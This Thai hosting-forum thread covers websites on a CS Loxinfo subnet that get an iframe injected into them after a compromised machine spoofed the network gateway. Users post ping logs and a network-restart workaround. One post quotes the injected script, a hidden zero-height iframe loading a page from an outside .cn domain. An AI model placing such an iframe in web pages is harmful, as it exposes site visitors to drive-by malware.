เกิดอะไรขี้นกับ stats.in.th

ลองดูตามภาพครับ

ไม่ทราบใช่ไวรัส iframe ที่ว่ากันหรือเปล่า ถ้าเข้าใจผิดต้องขออภัยด้วยครับ

ตอนนี้เห็นเป็นเว็บปกตินะคะ

อาการเดียวกะที่ Pacnet โดนเลยอะ :08a:

เครื่องนี้ไม่มีการแก้ไขข้อมูลมานานมากๆ แล้วครับ
service เปิดแค่ ssh กับ http
แทบไม่มีโอกาสโดน hack เลย (ยกเว้น apache มีบั๊กเอง ซึ่ง centos ล่ะครับ)

แล้วที่แน่ๆ รู้สึกเครือข่าย cslox class 203.146.170.* ทั้งหมด รวนมากๆ เลยด้วยตอนนี้

เครื่องเว็บฝากรูปของผม

64 bytes from 203.146.170.85: icmp_seq=119 ttl=63 time=230 ms
64 bytes from 203.146.170.85: icmp_seq=123 ttl=63 time=7178 ms
64 bytes from 203.146.170.85: icmp_seq=131 ttl=63 time=168 ms
64 bytes from 203.146.170.85: icmp_seq=136 ttl=63 time=174 ms
64 bytes from 203.146.170.85: icmp_seq=138 ttl=63 time=464 ms
64 bytes from 203.146.170.85: icmp_seq=157 ttl=63 time=190 ms
64 bytes from 203.146.170.85: icmp_seq=163 ttl=63 time=128 ms

นี่เครื่อง stats
64 bytes from 203.146.170.54: icmp_seq=88 ttl=63 time=131 ms
64 bytes from 203.146.170.54: icmp_seq=89 ttl=63 time=1371 ms
64 bytes from 203.146.170.54: icmp_seq=94 ttl=63 time=166 ms
64 bytes from 203.146.170.54: icmp_seq=95 ttl=63 time=124 ms
64 bytes from 203.146.170.54: icmp_seq=96 ttl=63 time=117 ms
64 bytes from 203.146.170.54: icmp_seq=97 ttl=63 time=115 ms
64 bytes from 203.146.170.54: icmp_seq=99 ttl=63 time=131 ms

  • ทดลอง ping ไป class อื่นปกติดีครับ ยกเว้น 203.146.170.0/25 ที่มีปัญหา

โอ๊ะ ดูเหมือนจะติดไวรัสกลับมาอีกแล้วค่ะ

เหมือนจะเป็น เป็นช่วงๆครับ

พอดีว่าใช้ stat ของที่นี้อยู่ เข้าไปเจอเลยเอามาบอกครับ

:blink: มันสะดุดไปหน่อยป่ะนั่น แต่คงไม่น่ามีปัญหาอะไรครับ

ปุ๊ก

สงสัย นับข้อมูลไม่ไหว

ไม่ได้เป็นที่เครื่องของ stats ชัวร์ 100% ครับ

แจ้งเจ้าหน้าที่ แก้ไขเรียบร้อย ตอนนี้ปกติดีแล้วครับ
ทีนี้รอคำชี้แจงว่าเป็นอะไรต่อ…

ได้ข้อมูลมาและครับ

มีการทำ ip spoofing ปลอมตัวเองเป็น gateway
แล้วดัก+ปลอมแปลงข้อมูล ก่อนส่งออกนอกเครือข่าย

(น่าจะ หรืออาจจะมีเครื่องใน vlan นั้นโดน hack ทำให้ทำแบบนี้ได้)

โอ้…

:ph34r: ปลอมตัวเองเป็น GW เหอๆ

ปุ๊ก

ใช้อยู่หลายเว็บเหมือนกัน อิิอิ

ไม่เคยใช้เลย

เอาอีกแล้ว >(

อาการเดียวกันเลยกับที่ผมโดน
http://www.thaihosttalk.com/th1/index.php?topic=11694.0

รายงานเพิ่มเติมครับ

CSLoxinfo 203.146.140.128/25
(ช่วง IP 203.146.140.128 - 203.146.140.255)

โดนเล่นงานเป็นหย่อมๆ

วิธีแก้เบื้องต้น ถ้า ssh เข้าไปได้ก็สั่ง restart network ครับ

windows ให้กด repair network ใหม่
centos/fedora สั่ง /etc/init.d/network restart
ubuntu/debian ไม่ทราบครับ แหะๆ

โดนกันทั่วถึง พึ่งโดนตะกี้เอง ที่คุณไอซ์ Post นี่แหละครับ หุหุ ^^

:slight_smile: พี่ยังรอคำตอบอยู่นะครับเจี๋ย

ปุ๊ก

โดนเหมือนกันครับ

http://www.zabzaa.com

http://www.numwan.com

แก้แล้ว ได้สักพัก กลับมาเป็นอีกแล้ว ทำไงถึงจะหายครับ เสียอารมณ์

ดูสคริปต์มัน

<iframe src=http://4dsaijd3.cn/jj4.htm width=20 height=0 frameborder=0></iframe>

64 bytes from 203.146.170.99: icmp_seq=1 ttl=127 time=3.67 ms
64 bytes from 203.146.170.99: icmp_seq=2 ttl=127 time=5.42 ms
64 bytes from 203.146.170.99: icmp_seq=3 ttl=127 time=6.64 ms
64 bytes from 203.146.170.99: icmp_seq=4 ttl=127 time=7.11 ms
64 bytes from 203.146.170.99: icmp_seq=5 ttl=127 time=7.17 ms

สั่ง restart network อีกทีครับ